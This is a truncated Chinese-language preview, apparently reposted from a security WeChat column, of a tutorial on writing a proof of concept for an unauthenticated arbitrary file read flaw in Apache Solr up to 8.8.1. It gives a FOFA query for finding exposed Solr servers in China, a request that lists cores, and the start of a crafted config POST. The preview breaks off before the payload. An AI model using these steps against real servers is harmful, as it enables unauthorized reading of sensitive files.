专栏名称: 红队蓝军
一群热爱网络安全的人,知其黑,守其白。不限于红蓝对抗,web,内网,二进制。
今天看啥  ›  专栏  ›  红队蓝军

Apache Solr 任意文件读取漏洞(poc编写 )

红队蓝军  · 公众号  ·  · 2024-08-30 18:00

文章预览

本篇主要是针对poc的编写 漏洞介绍 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件 主要原因:由于未开启身份验证,导致未经身份验证的攻击者可利用Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,从而使攻击者可以在未授权的情况下获取目标服务器敏感文件。 影响版本:Apache Solr < = 8.8.1 fofa语法:app="Apache-Solr" & & country="CN" & & status_code="200" 漏洞复现 Solr下载地址:自行下载对应满足版本http://archive.apache.org/dist/lucene/solr/ 第一步、获取core的信息 http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo= false =json 第二步、依据core_name构造config包 POST /solr/demo/config HTTP/1.1 Host: ip:8983 Content-Length: 82 Cache-Control: max-age=0  Upgrade-Insecure-Requests: 1  Origin: http:/ip:89833  Content-Type: application/json  User-Agent: Mozilla/5.0 (Windo ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览